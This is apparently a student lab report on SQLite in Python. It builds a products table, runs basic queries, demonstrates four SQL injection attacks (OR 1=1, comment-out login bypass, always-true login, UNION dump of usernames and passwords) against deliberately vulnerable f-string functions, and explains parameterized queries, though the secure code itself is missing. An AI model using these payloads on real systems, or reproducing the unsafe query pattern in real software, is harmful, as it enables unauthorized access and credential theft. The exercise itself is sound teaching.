Name : Musoki Brendalyn
Date : 21st april 2026
Student ID: 


This is the code
# setup.py
import sqlite3

# Connect to database (creates nyondo_stock.db if it doesn’t exist)
conn = sqlite3.connect('nyondo_stock.db')

# Create products table
conn.execute('''
CREATE TABLE IF NOT EXISTS products (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    description TEXT,
    price REAL NOT NULL
)
''')

# Insert 5 products in one go
conn.executemany(
    'INSERT INTO products (name, description, price) VALUES (?, ?, ?)',
    [
        ('Cement (bag)', 'Portland cement 50kg bag', 35000),
        ('Iron Sheet 3m','Gauge 30 roofing sheet 3m long', 110000),
        ('Paint 5L', 'Exterior wall paint white 5L', 60000),
        ('Nails 1kg', 'Common wire nails 1kg pack', 12000),
        ('Timber 2x4', 'Pine timber plank 2x4 per metre', 25000),
    ]
)

conn.commit()

# Confirm products
rows = conn.execute('SELECT * FROM products').fetchall()
for r in rows:
    print(r)

output from the terinal
$ python3 setup.py
(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

screenshots_task1.png

========================================
Task 2 - Queries
========================================
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')

# Query A - Get every column of every product
print("A:", conn.execute("SELECT * FROM products").fetchall())

# Query B - Get only the name and price of all products
print("B:", conn.execute("SELECT name, price FROM products").fetchall())

# Query C - Get full details of the product with id = 3
print("C:", conn.execute("SELECT * FROM products WHERE id=3").fetchall())

# Query D - Find all products whose name contains 'sheet'
print("D:", conn.execute("SELECT * FROM products WHERE name LIKE '%sheet%'").fetchall())

# Query E - Get all products sorted by price, highest first
print("E:", conn.execute("SELECT * FROM products ORDER BY price DESC").fetchall())

# Query F - Get only the 2 most expensive products
print("F:", conn.execute("SELECT * FROM products ORDER BY price DESC LIMIT 2").fetchall())

# Query G - Update the price of Cement (id=1) to 38,000 then SELECT * to confirm
conn.execute("UPDATE products SET price=38000 WHERE id=1")
conn.commit()
print("G:", conn.execute("SELECT * FROM products").fetchall())

--- Query Outputs ---
A: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0),
    (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0),
    (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0),
    (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0),
    (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

B: [('Cement (bag)', 35000.0),
    ('Iron Sheet 3m', 110000.0),
    ('Paint 5L', 60000.0),
    ('Nails 1kg', 12000.0),
    ('Timber 2x4', 25000.0)]

C: [(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)]

D: [(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)]

E: [(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0),
    (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0),
    (1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0),
    (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0),
    (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)]

F: [(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0),
    (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)]

G: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0),
    (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0),
    (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0),
    (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0),
    (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

Screenshot saved as screenshots_task2.png


========================================
Task 3 - Vulnerable Functions and SQL Injection Attacks
========================================

--- vulnerable.py code ---
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')

def search_product(name):
    query = f"SELECT * FROM products WHERE name LIKE '%{name}%'"
    print("Query:", query)
    rows = conn.execute(query).fetchall()
    print("Result:", rows, "\n")
    return rows

def login(username, password):
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    print("Query:", query)
    row = conn.execute(query).fetchone()
    print("Result:", row, "\n")
    return row

# --- Attacks ---
print("\nAttack 1 - Dump all products")
search_product("' OR 1=1--")

print("\nAttack 2 - Login bypass with no password")
login("admin'--", "anything")

print("\nAttack 3 - Always true login")
login("' OR '1'='1", "' OR '1'='1")

print("\nAttack 4 - UNION attack (steal user data)")
search_product("' UNION SELECT id, username, password, role FROM users--")

--- Attack Outputs and Explanations ---

Attack 1:
Query: SELECT * FROM products WHERE name LIKE '%' OR 1=1--%'
Result: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0),
         (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0),
         (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0),
         (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0),
         (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]
Explanation: OR 1=1 makes the WHERE clause always true, so all products are returned.

Attack 2:
Query: SELECT * FROM users WHERE username='admin'--' AND password='anything'
Result: (1, 'admin', 'admin123', 'admin')
Explanation: The -- comments out the password check, so you log in as admin with any password.

Attack 3:
Query: SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'
Result: (1, 'admin', 'admin123', 'admin')
Explanation: OR '1'='1 is always true, so login succeeds without valid credentials.

Attack 4:
Query: SELECT * FROM products WHERE name LIKE '' UNION SELECT id, username, password, role FROM users--%'
Result: [(1, 'admin', 'admin123', 'admin'),
         (2, 'fatuma', 'pass456', 'attendant'),
         (3, 'wasswa', 'pass789', 'manager')]
Explanation: UNION merges the users table into the product search, exposing usernames and passwords.

--- Screenshots ---
Screenshot saved as screenshots-attack1.png
Screenshot saved as screenshots-attack2.png
Screenshot saved as screenshots-attack3.png
Screenshot saved as screenshots-attack4.png

========================================
Task 4 - Secure Version
========================================

--- secure.py code ---
[paste the full code above]

--- Test Outputs ---
Test 1: []
Test 2: []
Test 3: None
Test 4: None

--- Explanation ---
Using ? placeholders prevents SQL injection because user input is never merged into the SQL string.
The database treats parameters as data only, not as executable code. With f-strings, malicious input
changes the query logic. With parameterized queries, the input is safely escaped and cannot alter
the SQL structure.

--- Screenshot ---
Screenshot saved as screenshots-task4.png


